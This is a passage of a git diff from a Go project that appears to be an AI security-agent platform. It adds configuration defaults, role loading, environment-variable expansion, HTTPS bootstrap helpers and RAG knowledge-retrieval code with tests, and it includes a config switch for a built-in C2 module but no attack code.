fmt.Errorf("工具命令不能为空") + } + + return &tool, nil +} + +// LoadRolesFromDir 从目录加载所有角色配置文件 +func LoadRolesFromDir(dir string) (map[string]RoleConfig, error) { + roles := make(map[string]RoleConfig) + + // 检查目录是否存在 + if _, err := os.Stat(dir); os.IsNotExist(err) { + return roles, nil // 目录不存在时返回空map,不报错 + } + + // 读取目录中的所有 .yaml 和 .yml 
文件 + entries, err := os.ReadDir(dir) + if err != nil { + return nil, fmt.Errorf("读取角色目录失败: %w", err) + } + + for _, entry := range entries { + if entry.IsDir() { + continue + } + + name := entry.Name() + if !strings.HasSuffix(name, ".yaml") && !strings.HasSuffix(name, ".yml") { + continue + } + + filePath := filepath.Join(dir, name) + role, err := LoadRoleFromFile(filePath) + if err != nil { + // 记录错误但继续加载其他文件 + fmt.Printf("警告: 加载角色配置文件 %s 失败: %v\n", filePath, err) + continue + } + + // 使用角色名称作为key + roleName := role.Name + if roleName == "" { + // 如果角色名称为空,使用文件名(去掉扩展名)作为名称 + roleName = strings.TrimSuffix(strings.TrimSuffix(name, ".yaml"), ".yml") + role.Name = roleName + } + + roles[roleName] = *role + } + + return roles, nil +} + +// LoadRoleFromFile 从单个文件加载角色配置 +func LoadRoleFromFile(path string) (*RoleConfig, error) { + data, err := os.ReadFile(path) + if err != nil { + return nil, fmt.Errorf("读取文件失败: %w", err) + } + + var role RoleConfig + if err := yaml.Unmarshal(data, &role); err != nil { + return nil, fmt.Errorf("解析角色配置失败: %w", err) + } + + // 处理 icon 字段:如果包含 Unicode 转义格式(\U0001F3C6),转换为实际的 Unicode 字符 + // Go 的 yaml 库可能不会自动解析 \U 转义序列,需要手动转换 + if role.Icon != "" { + icon := role.Icon + // 去除可能的引号 + icon = strings.Trim(icon, `"`) + + // 检查是否是 Unicode 转义格式 \U0001F3C6(8位十六进制)或 \uXXXX(4位十六进制) + if len(icon) >= 3 && icon[0] == '\\' { + if icon[1] == 'U' && len(icon) >= 10 { + // \U0001F3C6 格式(8位十六进制) + if codePoint, err := strconv.ParseInt(icon[2:10], 16, 32); err == nil { + role.Icon = string(rune(codePoint)) + } + } else if icon[1] == 'u' && len(icon) >= 6 { + // \uXXXX 格式(4位十六进制) + if codePoint, err := strconv.ParseInt(icon[2:6], 16, 32); err == nil { + role.Icon = string(rune(codePoint)) + } + } + } + } + + // 验证必需字段 + if role.Name == "" { + // 如果名称为空,尝试从文件名获取 + baseName := filepath.Base(path) + role.Name = strings.TrimSuffix(strings.TrimSuffix(baseName, ".yaml"), ".yml") + } + + return &role, nil +} + +func Default() *Config { + strictRobotIdentity := true + 
return &Config{ + Server: ServerConfig{ + Host: "0.0.0.0", + Port: 8080, + }, + Log: LogConfig{ + Level: "info", + Output: "stdout", + }, + MCP: MCPConfig{ + Enabled: true, + Host: "0.0.0.0", + Port: 8081, + }, + OpenAI: OpenAIConfig{ + BaseURL: "https://api.openai.com/v1", + Model: "gpt-4", + MaxTotalTokens: 120000, + }, + Agent: AgentConfig{ + MaxIterations: 30, // 默认最大迭代次数 + ToolTimeoutMinutes: 10, // 单次工具执行默认最多 10 分钟,避免异常长时间占用 + }, + Security: SecurityConfig{ + Tools: []ToolConfig{}, // 工具配置应该从 config.yaml 或 tools/ 目录加载 + ToolsDir: "tools", // 默认工具目录 + }, + Database: DatabaseConfig{ + Path: "data/conversations.db", + KnowledgeDBPath: "data/knowledge.db", // 默认知识库数据库路径 + }, + Auth: AuthConfig{ + SessionDurationHours: 12, + }, + Robots: RobotsConfig{ + Session: RobotSessionConfig{ + StrictUserIdentity: &strictRobotIdentity, + }, + }, + Knowledge: KnowledgeConfig{ + Enabled: true, + BasePath: "knowledge_base", + Embedding: EmbeddingConfig{ + Provider: "openai", + Model: "text-embedding-3-small", + BaseURL: "https://api.openai.com/v1", + }, + Retrieval: RetrievalConfig{ + TopK: 5, + SimilarityThreshold: 0.65, // 降低阈值到 0.65,减少漏检 + }, + Indexing: IndexingConfig{ + ChunkStrategy: "markdown_then_recursive", + RequestTimeoutSeconds: 120, + ChunkSize: 768, // 增加到 768,更好的上下文保持 + ChunkOverlap: 50, + MaxChunksPerItem: 20, // 限制单个知识项最多 20 个块,避免消耗过多配额 + BatchSize: 64, + PreferSourceFile: false, + MaxRPM: 100, // 默认 100 RPM,避免 429 错误 + RateLimitDelayMs: 600, // 600ms 间隔,对应 100 RPM + MaxRetries: 3, + RetryDelayMs: 1000, + SubIndexes: nil, + }, + }, + } +} + +// C2Config 内置 C2 模块开关(与知识库 enabled 语义一致:关闭后不初始化监听器、不注册 C2 MCP 工具)。 +type C2Config struct { + // Enabled 为 nil 表示未写配置,按 true 处理(兼容旧 config.yaml) + Enabled *bool `yaml:"enabled,omitempty" json:"enabled,omitempty"` +} + +// EnabledEffective 返回是否启用 C2;未显式配置时默认启用。 +func (c C2Config) EnabledEffective() bool { + if c.Enabled == nil { + return true + } + return *c.Enabled +} + +// C2Public 返回给前端的 C2 状态(仅标量)。 +type C2Public struct 
{ + Enabled bool `json:"enabled"` +} + +// Public 将内部配置转为 API 响应。 +func (c C2Config) Public() C2Public { + return C2Public{Enabled: c.EnabledEffective()} +} + +// C2APIUpdate 设置页/API 更新 C2 开关。 +type C2APIUpdate struct { + Enabled bool `json:"enabled"` +} + +// KnowledgeConfig 知识库配置 +type KnowledgeConfig struct { + Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用知识检索 + BasePath string `yaml:"base_path" json:"base_path"` // 知识库路径 + Embedding EmbeddingConfig `yaml:"embedding" json:"embedding"` + Retrieval RetrievalConfig `yaml:"retrieval" json:"retrieval"` + Indexing IndexingConfig `yaml:"indexing,omitempty" json:"indexing,omitempty"` // 索引构建配置 +} + +// IndexingConfig 索引构建配置(用于控制知识库索引构建时的行为) +type IndexingConfig struct { + // ChunkStrategy: "markdown_then_recursive"(默认,Eino Markdown 标题切分后再递归切)或 "recursive"(仅递归切分) + ChunkStrategy string `yaml:"chunk_strategy,omitempty" json:"chunk_strategy,omitempty"` + // RequestTimeoutSeconds 嵌入 HTTP 客户端超时(秒),0 表示使用默认 120 + RequestTimeoutSeconds int `yaml:"request_timeout_seconds,omitempty" json:"request_timeout_seconds,omitempty"` + // 分块配置 + ChunkSize int `yaml:"chunk_size,omitempty" json:"chunk_size,omitempty"` // 每个块的最大 token 数(估算),默认 512 + ChunkOverlap int `yaml:"chunk_overlap,omitempty" json:"chunk_overlap,omitempty"` // 块之间的重叠 token 数,默认 50 + MaxChunksPerItem int `yaml:"max_chunks_per_item,omitempty" json:"max_chunks_per_item,omitempty"` // 单个知识项的最大块数量,0 表示不限制 + + // PreferSourceFile 为 true 时优先用 Eino FileLoader 从 file_path 读原文再索引(与库内 content 不一致时以磁盘为准) + PreferSourceFile bool `yaml:"prefer_source_file,omitempty" json:"prefer_source_file,omitempty"` + + // 速率限制配置(用于避免 API 速率限制) + RateLimitDelayMs int `yaml:"rate_limit_delay_ms,omitempty" json:"rate_limit_delay_ms,omitempty"` // 请求间隔时间(毫秒),0 表示不使用固定延迟 + MaxRPM int `yaml:"max_rpm,omitempty" json:"max_rpm,omitempty"` // 每分钟最大请求数,0 表示不限制 + + // 重试配置(用于处理临时错误) + MaxRetries int `yaml:"max_retries,omitempty" json:"max_retries,omitempty"` // 最大重试次数,默认 3 + RetryDelayMs int 
`yaml:"retry_delay_ms,omitempty" json:"retry_delay_ms,omitempty"` // 重试间隔(毫秒),默认 1000 + + // BatchSize 嵌入批大小(SQLite 索引写入),0 表示默认 64 + BatchSize int `yaml:"batch_size,omitempty" json:"batch_size,omitempty"` + // SubIndexes 传入 Eino indexer.WithSubIndexes(逻辑分区标记,随 Document 元数据传递) + SubIndexes []string `yaml:"sub_indexes,omitempty" json:"sub_indexes,omitempty"` +} + +// EmbeddingConfig 嵌入配置 +type EmbeddingConfig struct { + Provider string `yaml:"provider" json:"provider"` // 嵌入模型提供商 + Model string `yaml:"model" json:"model"` // 模型名称 + BaseURL string `yaml:"base_url" json:"base_url"` // API Base URL + APIKey string `yaml:"api_key" json:"api_key"` // API Key(从OpenAI配置继承) +} + +// PostRetrieveConfig 检索后处理:固定对正文做规范化去重(最佳实践)、上下文预算截断;PrefetchTopK 用于多取候选再收敛到 top_k。 +type PostRetrieveConfig struct { + // PrefetchTopK 向量检索阶段最多保留的候选数(余弦序),应 ≥ top_k,0 表示与 top_k 相同;上限见知识库包内常量。 + PrefetchTopK int `yaml:"prefetch_top_k,omitempty" json:"prefetch_top_k,omitempty"` + // MaxContextChars 返回文档内容总 Unicode 字符数上限(整段 chunk,不截断半段);0 表示不限制。 + MaxContextChars int `yaml:"max_context_chars,omitempty" json:"max_context_chars,omitempty"` + // MaxContextTokens 返回文档内容总 token 上限(tiktoken,按嵌入模型名映射,失败则 cl100k_base);0 表示不限制。 + MaxContextTokens int `yaml:"max_context_tokens,omitempty" json:"max_context_tokens,omitempty"` +} + +// RetrievalConfig 检索配置 +type RetrievalConfig struct { + TopK int `yaml:"top_k" json:"top_k"` // 检索Top-K + SimilarityThreshold float64 `yaml:"similarity_threshold" json:"similarity_threshold"` // 余弦相似度阈值 + // SubIndexFilter 非空时仅保留 sub_indexes 含该标签(逗号分隔之一)的行;sub_indexes 为空的旧行仍返回。 + SubIndexFilter string `yaml:"sub_index_filter,omitempty" json:"sub_index_filter,omitempty"` + // PostRetrieve 检索后处理(去重、预算截断);重排通过代码注入 [knowledge.DocumentReranker]。 + PostRetrieve PostRetrieveConfig `yaml:"post_retrieve,omitempty" json:"post_retrieve,omitempty"` +} + +// RolesConfig 角色配置(已废弃,使用 map[string]RoleConfig 替代) +// 保留此类型以兼容旧代码,但建议直接使用 map[string]RoleConfig +type RolesConfig struct { + Roles 
map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` +} + +// RoleConfig 单个角色配置 +type RoleConfig struct { + Name string `yaml:"name" json:"name"` // 角色名称 + Description string `yaml:"description" json:"description"` // 角色描述 + UserPrompt string `yaml:"user_prompt" json:"user_prompt"` // 用户提示词(追加到用户消息前) + Icon string `yaml:"icon,omitempty" json:"icon,omitempty"` // 角色图标(可选) + Tools []string `yaml:"tools,omitempty" json:"tools,omitempty"` // 关联的工具列表(toolKey格式,如 "toolName" 或 "mcpName::toolName") + MCPs []string `yaml:"mcps,omitempty" json:"mcps,omitempty"` // 向后兼容:关联的MCP服务器列表(已废弃,使用tools替代) + Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用 +} diff --git a/config/envexpand.go b/config/envexpand.go new file mode 100644 index 00000000..0ffc1784 --- /dev/null +++ b/config/envexpand.go @@ -0,0 +1,66 @@ +package config + +import ( + "os" + "strings" +) + +// expandEnvVar 展开字符串中的 ${VAR} 和 ${VAR:-default} 环境变量引用。 +// 与官方 MCP 配置格式一致(Claude Desktop / Cursor / VS Code 均支持此语法)。 +func expandEnvVar(s string) string { + var b strings.Builder + i := 0 + for i < len(s) { + // 查找 ${ + idx := strings.Index(s[i:], "${") + if idx < 0 { + b.WriteString(s[i:]) + break + } + b.WriteString(s[i : i+idx]) + i += idx + 2 // skip ${ + + // 查找对应的 } + end := strings.IndexByte(s[i:], '}') + if end < 0 { + // 没有 },原样保留 + b.WriteString("${") + continue + } + expr := s[i : i+end] + i += end + 1 // skip } + + // 解析 VAR:-default + varName := expr + defaultVal := "" + hasDefault := false + if colonIdx := strings.Index(expr, ":-"); colonIdx >= 0 { + varName = expr[:colonIdx] + defaultVal = expr[colonIdx+2:] + hasDefault = true + } + + val := os.Getenv(varName) + if val == "" && hasDefault { + val = defaultVal + } + b.WriteString(val) + } + return b.String() +} + +// ExpandConfigEnv 展开 ExternalMCPServerConfig 中所有支持环境变量的字段。 +// 展开范围:Command、Args、Env values、URL、Headers values。 +func ExpandConfigEnv(cfg *ExternalMCPServerConfig) { + cfg.Command = expandEnvVar(cfg.Command) + for i, arg := 
range cfg.Args { + cfg.Args[i] = expandEnvVar(arg) + } + for k, v := range cfg.Env { + cfg.Env[k] = expandEnvVar(v) + } + cfg.URL = expandEnvVar(cfg.URL) + for k, v := range cfg.Headers { + cfg.Headers[k] = expandEnvVar(v) + } +} diff --git a/config/envexpand_test.go b/config/envexpand_test.go new file mode 100644 index 00000000..a17c4514 --- /dev/null +++ b/config/envexpand_test.go @@ -0,0 +1,81 @@ +package config + +import ( + "os" + "testing" +) + +func TestExpandEnvVar(t *testing.T) { + os.Setenv("TEST_MCP_VAR", "hello") + os.Setenv("TEST_MCP_PATH", "/usr/local/bin") + defer os.Unsetenv("TEST_MCP_VAR") + defer os.Unsetenv("TEST_MCP_PATH") + + tests := []struct { + name string + input string + expect string + }{ + {"plain string", "no vars here", "no vars here"}, + {"empty string", "", ""}, + {"simple var", "${TEST_MCP_VAR}", "hello"}, + {"var in middle", "prefix-${TEST_MCP_VAR}-suffix", "prefix-hello-suffix"}, + {"multiple vars", "${TEST_MCP_PATH}/${TEST_MCP_VAR}", "/usr/local/bin/hello"}, + {"missing var empty", "${NONEXISTENT_MCP_VAR_XYZ}", ""}, + {"default value used", "${NONEXISTENT_MCP_VAR_XYZ:-fallback}", "fallback"}, + {"default not used", "${TEST_MCP_VAR:-unused}", "hello"}, + {"default with path", "${NONEXISTENT_MCP_VAR_XYZ:-/tmp/default}", "/tmp/default"}, + {"unclosed brace", "${UNCLOSED", "${UNCLOSED"}, + {"dollar without brace", "$PLAIN", "$PLAIN"}, + {"empty var name", "${}", ""}, + {"default empty var", "${:-default}", "default"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + got := expandEnvVar(tt.input) + if got != tt.expect { + t.Errorf("expandEnvVar(%q) = %q, want %q", tt.input, got, tt.expect) + } + }) + } +} + +func TestExpandConfigEnv(t *testing.T) { + os.Setenv("TEST_MCP_CMD", "python3") + os.Setenv("TEST_MCP_TOKEN", "secret123") + defer os.Unsetenv("TEST_MCP_CMD") + defer os.Unsetenv("TEST_MCP_TOKEN") + + cfg := &ExternalMCPServerConfig{ + Command: "${TEST_MCP_CMD}", + Args: []string{"--token", 
"${TEST_MCP_TOKEN}", "${MISSING:-default_arg}"}, + Env: map[string]string{"API_KEY": "${TEST_MCP_TOKEN}", "LEVEL": "${MISSING:-INFO}"}, + URL: "https://${MISSING:-example.com}/mcp", + Headers: map[string]string{"Authorization": "Bearer ${TEST_MCP_TOKEN}"}, + } + + ExpandConfigEnv(cfg) + + if cfg.Command != "python3" { + t.Errorf("Command = %q, want %q", cfg.Command, "python3") + } + if cfg.Args[1] != "secret123" { + t.Errorf("Args[1] = %q, want %q", cfg.Args[1], "secret123") + } + if cfg.Args[2] != "default_arg" { + t.Errorf("Args[2] = %q, want %q", cfg.Args[2], "default_arg") + } + if cfg.Env["API_KEY"] != "secret123" { + t.Errorf("Env[API_KEY] = %q, want %q", cfg.Env["API_KEY"], "secret123") + } + if cfg.Env["LEVEL"] != "INFO" { + t.Errorf("Env[LEVEL] = %q, want %q", cfg.Env["LEVEL"], "INFO") + } + if cfg.URL != "https://example.com/mcp" { + t.Errorf("URL = %q, want %q", cfg.URL, "https://example.com/mcp") + } + if cfg.Headers["Authorization"] != "Bearer secret123" { + t.Errorf("Headers[Authorization] = %q, want %q", cfg.Headers["Authorization"], "Bearer secret123") + } +} diff --git a/config/server_https_bootstrap.go b/config/server_https_bootstrap.go new file mode 100644 index 00000000..80a4e4d2 --- /dev/null +++ b/config/server_https_bootstrap.go @@ -0,0 +1,46 @@ +package config + +import "strings" + +// MainWebUIUsesHTTPS 判断主 Web UI 是否以 HTTPS 监听(与 internal/app.prepareMainServerTLS 前置条件一致)。 +func MainWebUIUsesHTTPS(s *ServerConfig) bool { + if s == nil { + return false + } + if s.TLSEnabled { + return true + } + if s.TLSAutoSelfSign { + return true + } + cert := strings.TrimSpace(s.TLSCertPath) + key := strings.TrimSpace(s.TLSKeyPath) + return cert != "" && key != "" +} + +// ServerHTTPRedirectEnabled 是否在主站启用 HTTPS 时把明文 HTTP 请求重定向到 HTTPS(默认开启)。 +func ServerHTTPRedirectEnabled(s *ServerConfig) bool { + if s == nil || !MainWebUIUsesHTTPS(s) { + return false + } + if s.TLSHTTPRedirect == nil { + return true + } + return *s.TLSHTTPRedirect +} + +// 
ApplyDevHTTPSBootstrap 供 --https / 一键脚本使用:强制开启主站 TLS。 +// 若已配置 tls_cert_path 与 tls_key_path 则仅用 PEM,不开启自签;否则启用 tls_auto_self_sign(内存证书,仅本地测试)。 +func ApplyDevHTTPSBootstrap(cfg *Config) { + if cfg == nil { + return + } + cfg.Server.TLSEnabled = true + cert := strings.TrimSpace(cfg.Server.TLSCertPath) + key := strings.TrimSpace(cfg.Server.TLSKeyPath) + if cert != "" && key != "" { + cfg.Server.TLSAutoSelfSign = false + return + } + cfg.Server.TLSAutoSelfSign = true +} diff --git a/knowledge/chunk_eino.go b/knowledge/chunk_eino.go new file mode 100644 index 00000000..6592f350 --- /dev/null +++ b/knowledge/chunk_eino.go @@ -0,0 +1,67 @@ +package knowledge + +import ( + "context" + "fmt" + "strings" + + "github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown" + "github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive" + "github.com/cloudwego/eino/components/document" + "github.com/pkoukk/tiktoken-go" +) + +func tokenizerLenFunc(embeddingModel string) func(string) int { + fallback := func(s string) int { + r := []rune(s) + if len(r) == 0 { + return 0 + } + return (len(r) + 3) / 4 + } + m := strings.TrimSpace(embeddingModel) + if m == "" { + return fallback + } + tok, err := tiktoken.EncodingForModel(m) + if err != nil { + return fallback + } + return func(s string) int { + return len(tok.Encode(s, nil, nil)) + } +} + +// newKnowledgeSplitter builds an Eino recursive text splitter. LenFunc uses tiktoken for +// embeddingModel when available, else rune/4 approximation. 
+func newKnowledgeSplitter(chunkSize, overlap int, embeddingModel string) (document.Transformer, error) { + if chunkSize <= 0 { + return nil, fmt.Errorf("chunk size must be positive") + } + if overlap < 0 { + overlap = 0 + } + return recursive.NewSplitter(context.Background(), &recursive.Config{ + ChunkSize: chunkSize, + OverlapSize: overlap, + LenFunc: tokenizerLenFunc(embeddingModel), + Separators: []string{ + "\n\n", "\n## ", "\n### ", "\n#### ", "\n", + "。", "!", "?", ". ", "? ", "! ", + " ", + }, + }) +} + +// newMarkdownHeaderSplitter Eino-ext Markdown 按标题切分(#~####),适合技术/Markdown 知识库。 +func newMarkdownHeaderSplitter(ctx context.Context) (document.Transformer, error) { + return markdown.NewHeaderSplitter(ctx, &markdown.HeaderConfig{ + Headers: map[string]string{ + "#": "h1", + "##": "h2", + "###": "h3", + "####": "h4", + }, + TrimHeaders: false, + }) +} diff --git a/knowledge/eino_meta.go b/knowledge/eino_meta.go new file mode 100644 index 00000000..0ee7c41b --- /dev/null +++ b/knowledge/eino_meta.go @@ -0,0 +1,129 @@ +package knowledge + +import ( + "fmt" + "strings" +) + +// Document metadata keys for Eino schema.Document flowing through the RAG pipeline. +const ( + metaKBCategory = "kb_category" + metaKBTitle = "kb_title" + metaKBItemID = "kb_item_id" + metaKBChunkIndex = "kb_chunk_index" + metaSimilarity = "similarity" +) + +// DSL keys for [VectorEinoRetriever.Retrieve] via [retriever.WithDSLInfo]. +const ( + DSLRiskType = "risk_type" + DSLSimilarityThreshold = "similarity_threshold" + DSLSubIndexFilter = "sub_index_filter" +) + +// FormatEmbeddingInput matches the historical indexing format so existing embeddings +// stay comparable if users skip reindex; new indexes use the same string shape. 
func FormatEmbeddingInput(category, title, chunkText string) string {
	// Layout: "[风险类型:<category>] [标题:<title>]", a newline, then the chunk text.
	return fmt.Sprintf("[风险类型:%s] [标题:%s]\n%s", category, title, chunkText)
}

// FormatQueryEmbeddingText builds the string embedded at query time so it matches
// [FormatEmbeddingInput] for the same risk category (title left empty for queries).
// Both arguments are trimmed; when riskType is blank the trimmed query is
// returned on its own, without any prefix.
func FormatQueryEmbeddingText(riskType, query string) string {
	q := strings.TrimSpace(query)
	rt := strings.TrimSpace(riskType)
	if rt != "" {
		return FormatEmbeddingInput(rt, "", q)
	}
	return q
}

// MetaLookupString returns metadata string value or "" if absent.
// A nil map, a missing key and a nil value all yield "". String values are
// returned unchanged; any other type is rendered with fmt.Sprint and trimmed.
func MetaLookupString(md map[string]any, key string) string {
	if md == nil {
		return ""
	}
	v, ok := md[key]
	if !ok || v == nil {
		return ""
	}
	switch t := v.(type) {
	case string:
		return t
	default:
		return strings.TrimSpace(fmt.Sprint(t))
	}
}

// MetaStringOK returns trimmed non-empty string and true if present and non-empty.
// It returns ("", false) when the value is absent or blank after trimming.
func MetaStringOK(md map[string]any, key string) (string, bool) {
	s := strings.TrimSpace(MetaLookupString(md, key))
	if s == "" {
		return "", false
	}
	return s, true
}

// RequireMetaString requires a non-empty string metadata field.
// It returns the trimmed value, or an error naming the key when the value is
// missing or blank.
func RequireMetaString(md map[string]any, key string) (string, error) {
	s, ok := MetaStringOK(md, key)
	if !ok {
		return "", fmt.Errorf("missing or empty metadata %q", key)
	}
	return s, nil
}

// RequireMetaInt requires an integer metadata field.
//
// Accepted dynamic types are int, int32, int64 and float64 (the type that
// encoding/json produces for numbers decoded into an any). A float64 is
// accepted only when it holds an integral value that survives the round trip
// through int: fractional values, NaN and infinities are rejected with an
// error instead of being silently truncated into a wrong index.
//
// It returns an error when the key is missing (including a nil map) or when
// the value has any other type.
func RequireMetaInt(md map[string]any, key string) (int, error) {
	// Indexing a nil map is safe and simply reports ok == false.
	v, ok := md[key]
	if !ok {
		return 0, fmt.Errorf("missing metadata key %q", key)
	}
	switch t := v.(type) {
	case int:
		return t, nil
	case int32:
		return int(t), nil
	case int64:
		return int(t), nil
	case float64:
		n := int(t)
		// NaN never compares equal, and fractional or out-of-range values do
		// not round-trip, so this single comparison rejects all of them.
		if float64(n) != t {
			return 0, fmt.Errorf("metadata %q: non-integer value %v", key, t)
		}
		return n, nil
	default:
		return 0, fmt.Errorf("metadata %q: unsupported type %T", key, v)
	}
}

// DSLNumeric coerces DSL map values (e.g. from JSON) to float64.
+func DSLNumeric(v any) (float64, bool) { + switch t := v.(type) { + case float64: + return t, true + case float32: + return float64(t), true + case int: + return float64(t), true + case int64: + return float64(t), true + case uint32: + return float64(t), true + case uint64: + return float64(t), true + default: + return 0, false + } +} + +// MetaFloat64OK reads a float metadata value. +func MetaFloat64OK(md map[string]any, key string) (float64, bool) { + if md == nil { + return 0, false + } + v, ok := md[key] + if !ok { + return 0, false + } + return DSLNumeric(v) +} diff --git a/knowledge/eino_meta_test.go b/knowledge/eino_meta_test.go new file mode 100644 index 00000000..ba3f60da --- /dev/null +++ b/knowledge/eino_meta_test.go @@ -0,0 +1,14 @@ +package knowledge + +import "testing" + +func TestFormatQueryEmbeddingText_AlignsWithIndexPrefix(t *testing.T) { + q := FormatQueryEmbeddingText("XSS", "payload") + want := FormatEmbeddingInput("XSS", "", "payload") + if q != want { + t.Fatalf("query embed text mismatch:\n got: %q\nwant: %q", q, want) + } + if FormatQueryEmbeddingText("", "hello") != "hello" { + t.Fatalf("expected bare query without risk type") + } +} diff --git a/knowledge/eino_retrieve_chain.go b/knowledge/eino_retrieve_chain.go new file mode 100644 index 00000000..2d1b72eb --- /dev/null +++ b/knowledge/eino_retrieve_chain.go @@ -0,0 +1,25 @@ +package knowledge + +import ( + "context" + "fmt" + + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" +) + +// BuildKnowledgeRetrieveChain 编译「查询字符串 → 文档列表」的 Eino Chain,底层为 SQLite 向量检索([VectorEinoRetriever])。 +// 去重、上下文预算截断与最终 Top-K 均在 [VectorEinoRetriever.Retrieve] 内完成,与 HTTP/MCP 检索路径一致。 +func BuildKnowledgeRetrieveChain(ctx context.Context, r *Retriever) (compose.Runnable[string, []*schema.Document], error) { + if r == nil { + return nil, fmt.Errorf("retriever is nil") + } + ch := compose.NewChain[string, []*schema.Document]() + ch.AppendRetriever(r.AsEinoRetriever()) + return 
ch.Compile(ctx) +} + +// CompileRetrieveChain 等价于 [BuildKnowledgeRetrieveChain](ctx, r)。 +func (r *Retriever) CompileRetrieveChain(ctx context.Context) (compose.Runnable[string, []*schema.Document], error) { + return BuildKnowledgeRetrieveChain(ctx, r) +} diff --git a/knowledge/eino_retrieve_chain_test.go b/knowledge/eino_retrieve_chain_test.go new file mode 100644 index 00000000..c74a6900 --- /dev/null +++ b/knowledge/eino_retrieve_chain_test.go @@ -0,0 +1,23 @@ +package knowledge + +import ( + "context" + "testing" + + "go.uber.org/zap" +) + +func TestBuildKnowledgeRetrieveChain_Compile(t *testing.T) { + r := NewRetriever(nil, nil, &RetrievalConfig{TopK: 3, SimilarityThreshold: 0.5}, zap.NewNop()) + _, err := BuildKnowledgeRetrieveChain(context.Background(), r) + if err != nil { + t.Fatal(err) + } +} + +func TestBuildKnowledgeRetrieveChain_NilRetriever(t *testing.T) { + _, err := BuildKnowledgeRetrieveChain(context.Background(), nil) + if err == nil { + t.Fatal("expected error for nil retriever") + } +} diff --git a/knowledge/eino_retriever_adapter.go b/knowledge/eino_retriever_adapter.go new file mode 100644 index 00000000..f5635121 --- /dev/null +++ b/knowledge/eino_retriever_adapter.go @@ -0,0 +1,202 @@ +package knowledge + +import ( + "context" + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/callbacks" + "github.com/cloudwego/eino/components" + "github.com/cloudwego/eino/components/retriever" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// VectorEinoRetriever implements [retriever.Retriever] on top of SQLite-stored embeddings + cosine similarity. +// +// Options: +// - [retriever.WithTopK] +// - [retriever.WithDSLInfo] with [DSLRiskType] (string), [DSLSimilarityThreshold] (float, cosine 0–1), [DSLSubIndexFilter] (string) +// +// Document scores are cosine similarity; [retriever.WithScoreThreshold] is not mapped to a different metric. 
+// +// After vector search: optional [DocumentReranker] (see [Retriever.SetDocumentReranker]), then +// [ApplyPostRetrieve] (normalized-text dedupe, context budget, final Top-K) using [config.PostRetrieveConfig]. +type VectorEinoRetriever struct { + inner *Retriever +} + +// NewVectorEinoRetriever wraps r for Eino compose / tooling. +func NewVectorEinoRetriever(r *Retriever) *VectorEinoRetriever { + if r == nil { + return nil + } + return &VectorEinoRetriever{inner: r} +} + +// GetType identifies this retriever for Eino callbacks. +func (h *VectorEinoRetriever) GetType() string { + return "SQLiteVectorKnowledgeRetriever" +} + +// Retrieve runs vector search and returns [schema.Document] rows. +func (h *VectorEinoRetriever) Retrieve(ctx context.Context, query string, opts ...retriever.Option) (out []*schema.Document, err error) { + if h == nil || h.inner == nil { + return nil, fmt.Errorf("VectorEinoRetriever: nil retriever") + } + q := strings.TrimSpace(query) + if q == "" { + return nil, fmt.Errorf("查询不能为空") + } + + ro := retriever.GetCommonOptions(nil, opts...) 
+ cfg := h.inner.config + + req := &SearchRequest{Query: q} + + if ro.TopK != nil && *ro.TopK > 0 { + req.TopK = *ro.TopK + } else if cfg != nil && cfg.TopK > 0 { + req.TopK = cfg.TopK + } else { + req.TopK = 5 + } + + req.Threshold = 0 + if ro.DSLInfo != nil { + if rt, ok := ro.DSLInfo[DSLRiskType].(string); ok { + req.RiskType = strings.TrimSpace(rt) + } + if v, ok := ro.DSLInfo[DSLSimilarityThreshold]; ok { + if f, ok2 := DSLNumeric(v); ok2 && f > 0 { + req.Threshold = f + } + } + if sf, ok := ro.DSLInfo[DSLSubIndexFilter].(string); ok { + req.SubIndexFilter = strings.TrimSpace(sf) + } + } + if req.SubIndexFilter == "" && cfg != nil && strings.TrimSpace(cfg.SubIndexFilter) != "" { + req.SubIndexFilter = strings.TrimSpace(cfg.SubIndexFilter) + } + if req.Threshold <= 0 && cfg != nil && cfg.SimilarityThreshold > 0 { + req.Threshold = cfg.SimilarityThreshold + } + if req.Threshold <= 0 { + req.Threshold = 0.7 + } + + finalTopK := req.TopK + var postPO *config.PostRetrieveConfig + if cfg != nil { + postPO = &cfg.PostRetrieve + } + fetchK := EffectivePrefetchTopK(finalTopK, postPO) + searchReq := *req + searchReq.TopK = fetchK + + ctx = callbacks.EnsureRunInfo(ctx, h.GetType(), components.ComponentOfRetriever) + th := req.Threshold + st := &th + ctx = callbacks.OnStart(ctx, &retriever.CallbackInput{ + Query: q, + TopK: finalTopK, + ScoreThreshold: st, + Extra: ro.DSLInfo, + }) + defer func() { + if err != nil { + _ = callbacks.OnError(ctx, err) + return + } + _ = callbacks.OnEnd(ctx, &retriever.CallbackOutput{Docs: out}) + }() + + results, err := h.inner.vectorSearch(ctx, &searchReq) + if err != nil { + return nil, err + } + out = retrievalResultsToDocuments(results) + + if rr := h.inner.documentReranker(); rr != nil && len(out) > 1 { + reranked, rerr := rr.Rerank(ctx, q, out) + if rerr != nil { + if h.inner.logger != nil { + h.inner.logger.Warn("知识检索重排失败,已使用向量序", zap.Error(rerr)) + } + } else if len(reranked) > 0 { + out = reranked + } + } + + tokenModel := "" + if 
h.inner.embedder != nil { + tokenModel = h.inner.embedder.EmbeddingModelName() + } + out, err = ApplyPostRetrieve(out, postPO, tokenModel, finalTopK) + if err != nil { + return nil, err + } + return out, nil +} + +func retrievalResultsToDocuments(results []*RetrievalResult) []*schema.Document { + out := make([]*schema.Document, 0, len(results)) + for _, res := range results { + if res == nil || res.Chunk == nil || res.Item == nil { + continue + } + d := &schema.Document{ + ID: res.Chunk.ID, + Content: res.Chunk.ChunkText, + MetaData: map[string]any{ + metaKBItemID: res.Item.ID, + metaKBCategory: res.Item.Category, + metaKBTitle: res.Item.Title, + metaKBChunkIndex: res.Chunk.ChunkIndex, + metaSimilarity: res.Similarity, + }, + } + d.WithScore(res.Score) + out = append(out, d) + } + return out +} + +func documentsToRetrievalResults(docs []*schema.Document) ([]*RetrievalResult, error) { + out := make([]*RetrievalResult, 0, len(docs)) + for i, d := range docs { + if d == nil { + 